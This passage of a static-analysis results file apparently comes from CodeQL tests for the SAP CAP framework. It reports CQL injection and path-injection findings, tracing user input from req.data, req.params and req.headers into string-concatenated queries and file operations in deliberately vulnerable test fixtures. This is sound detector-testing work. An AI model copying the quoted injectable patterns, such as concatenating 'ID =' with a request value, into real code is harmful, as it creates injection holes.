}"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":754,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":755,"startColumn":47,"endColumn":49}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":755,"startColumn":38,"endColumn":49}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":754,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":754,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":755,"startColumn":38,"endColumn":49}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":760,"startColumn":7,"endColumn":50}}}],"partialFingerprints":{"primaryLocationLineHash":"52425ca44df0fb9c:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":759,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":759,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":759,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":760,"startColumn":47,"endColumn":49}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":760,"startColumn":38,"endColumn":49}},"message":{"text":"`ID =` + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":759,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":759,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":760,"startColumn":38,"endColumn":49}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":765,"startColumn":7,"endColumn":51}}}],"partialFingerprints":{"primaryLocationLineHash":"abfa3b0ed80d2aef:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":764,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":764,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":764,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":765,"startColumn":46,"endColumn":48}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":765,"startColumn":38,"endColumn":50}},"message":{"text":"`ID = ${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":764,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":764,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":765,"startColumn":38,"endColumn":50}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":22,"startColumn":36,"endColumn":42}}}],"partialFingerprints":{"primaryLocationLineHash":"d2d019c78ead4486:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}},"message":{"text":"req.params"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":19,"endColumn":33}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":12,"startColumn":38,"endColumn":52}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":12,"startColumn":28,"endColumn":53}},"message":{"text":"decodeU ... tthree)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":12,"startColumn":19,"endColumn":25}},"message":{"text":"taint1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":22,"startColumn":36,"endColumn":42}},"message":{"text":"taint1"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":24,"startColumn":40,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"808bce90854ae867:1","primaryLocationStartColumnFingerprint":"27"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}},"message":{"text":"req.params"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":19,"endColumn":33}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":14,"startColumn":47,"endColumn":61}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":14,"startColumn":28,"endColumn":62}},"message":{"text":"decodeU ... tthree)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":14,"startColumn":19,"endColumn":25}},"message":{"text":"taint2"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":24,"startColumn":40,"endColumn":46}},"message":{"text":"taint2"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":26,"startColumn":34,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"afb5d6b9785b49d5:1","primaryLocationStartColumnFingerprint":"21"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}},"message":{"text":"req.params"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":19,"endColumn":33}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":16,"startColumn":34,"endColumn":48}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":16,"startColumn":28,"endColumn":49}},"message":{"text":"local(u ... tthree)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":16,"startColumn":19,"endColumn":25}},"message":{"text":"taint3"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":26,"startColumn":34,"endColumn":40}},"message":{"text":"taint3"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":28,"startColumn":34,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"bb2ecd3739649840:1","primaryLocationStartColumnFingerprint":"21"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}},"message":{"text":"req.params"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":19,"endColumn":33}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":18,"startColumn":34,"endColumn":48}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":18,"startColumn":28,"endColumn":49}},"message":{"text":"isdir(u ... tthree)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":18,"startColumn":19,"endColumn":25}},"message":{"text":"taint4"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":28,"startColumn":34,"endColumn":40}},"message":{"text":"taint4"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":30,"startColumn":40,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"63e729e91fdc10d2:1","primaryLocationStartColumnFingerprint":"27"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}},"message":{"text":"req.params"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":19,"endColumn":33}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":20,"startColumn":35,"endColumn":49}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":20,"startColumn":28,"endColumn":50}},"message":{"text":"isfile( ... tthree)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":20,"startColumn":19,"endColumn":25}},"message":{"text":"taint5"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":30,"startColumn":40,"endColumn":46}},"message":{"text":"taint5"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":31,"startColumn":26,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"84f3986f7255c726:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":31,"startColumn":26,"endColumn":35}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":33,"startColumn":38,"endColumn":47}}}],"partialFingerprints":{"primaryLocationLineHash":"7f1379ebf3dd2fef:1","primaryLocationStartColumnFingerprint":"25"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":33,"startColumn":38,"endColumn":47}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file read."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":34,"startColumn":24,"endColumn":33}}}],"partialFingerprints":{"primaryLocationLineHash":"45cd294f7937b77e:1","primaryLocationStartColumnFingerprint":"11"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":34,"startColumn":24,"endColumn":33}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":36,"startColumn":44,"endColumn":53}}}],"partialFingerprints":{"primaryLocationLineHash":"15c5f129eb53b929:1","primaryLocationStartColumnFingerprint":"31"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":36,"startColumn":44,"endColumn":53}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in tainted data being written to a file."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":37,"startColumn":25,"endColumn":37}}}],"partialFingerprints":{"primaryLocationLineHash":"f976670d2acc6fb9:1","primaryLocationStartColumnFingerprint":"12"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":9,"startColumn":34,"endColumn":45}},"message":{"text":"req.headers"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":9,"startColumn":19,"endColumn":31}},"message":{"text":"userinputtwo"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":37,"startColumn":25,"endColumn":37}},"message":{"text":"userinputtwo"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":9,"startColumn":34,"endColumn":45}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":38,"startColumn":25,"endColumn":34}}}],"partialFingerprints":{"primaryLocationLineHash":"7608589b7693ec5e:1","primaryLocationStartColumnFingerprint":"12"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":38,"startColumn":25,"endColumn":34}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":40,"startColumn":26,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"9efda1281fa0866d:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":40,"startColumn":26,"endColumn":35}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file 